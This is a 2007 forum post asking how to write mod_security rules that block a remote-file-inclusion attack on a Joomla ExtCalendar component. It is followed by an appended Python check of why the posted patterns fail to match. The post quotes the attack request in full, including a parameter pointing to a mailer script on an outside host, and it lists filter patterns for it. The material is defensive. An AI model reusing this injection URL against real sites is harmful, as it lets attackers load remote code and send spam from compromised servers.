mod_security rules help - block external mailer script

Discussion in 'Security' started by jeroman8, Jun 19, 2007.

    Hello!

    I'm trying to block so the following command/address can't be run, but without blocking
    too much, so that OK commands can be run.

    components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://bs-club.net/cache/Shaun$.txt?

    In mod security I have added this:

    SecFilterSelective THE_REQUEST "=http//"
    SecFilterSelective THE_REQUEST "d=http"
    SecFilterSelective THE_REQUEST "admin_events.php?CONFIG_EXT"
    SecFilterSelective THE_REQUEST "inc_dir=http"
    SecFilter "admin_events.php?CONFIG_EXT"
    SecFilter "d=http"
    SecFilter "inc_dir=http"

    The strange thing is if I add manually for example in address field:

    components/com_extcalendar/d=http

    Then I get forbidden, mod_sec blocks it.
    But none of the above rules work when it's in the address as above/top - something
    makes a difference in that URL because the page is viewable and you can send email.
    It's a mailer script being loaded from another server.

    Even if I chmod 000 the admin_events.php - I can load the page !!
    I guess it's because it's really not the file you're loading, it's the external file but
    hm... it should be forbidden anyway I think.

    But the rules - anyone know how to block it alright ?
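
An added example, not part of the original post: a Python check of the posted patterns against a request line modelled on the one above, both raw and URL-decoded. It assumes the filter keywords are evaluated as regular expressions and that the engine matches against the decoded request; the host `remote.example`, the `FIXED` patterns and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed request line modelled on the URL in the post (placeholder host).
RAW = ("GET /components/com_extcalendar/admin_events.php"
       "?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://remote.example/x.txt? HTTP/1.1")

# Patterns exactly as posted in the rules above.
POSTED = ["=http//", "d=http", "admin_events.php?CONFIG_EXT", "inc_dir=http"]

# Hypothetical replacements: the "?" is escaped so it is a literal character,
# and the URL check no longer depends on the letter before "=".
FIXED = [r"admin_events\.php\?CONFIG_EXT", r"=\s*(?:https?|ftp)://"]


def hits(patterns, text):
    """Return the patterns that match anywhere in text, treated as regexes."""
    return [p for p in patterns if re.search(p, text, re.IGNORECASE)]


def report(request_line):
    """Compare matches on the raw request line and on its URL-decoded form."""
    decoded = unquote(request_line)  # %5b -> "[", %5d -> "]"
    return {
        "posted_raw": hits(POSTED, request_line),
        "posted_decoded": hits(POSTED, decoded),
        "fixed_decoded": hits(FIXED, decoded),
    }


if __name__ == "__main__":
    for name, matched in report(RAW).items():
        print(f"{name:15} {matched}")
    # The manual test from the post contains a literal "d=http", so it matches.
    print(hits(POSTED, "GET /components/com_extcalendar/d=http HTTP/1.1"))
```

Under those assumptions, `d=http` only matches the raw line because of the trailing `d` in `%5d`, which becomes `]` once decoded, and the unescaped `?` makes the preceding `p` optional instead of matching a literal question mark.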
     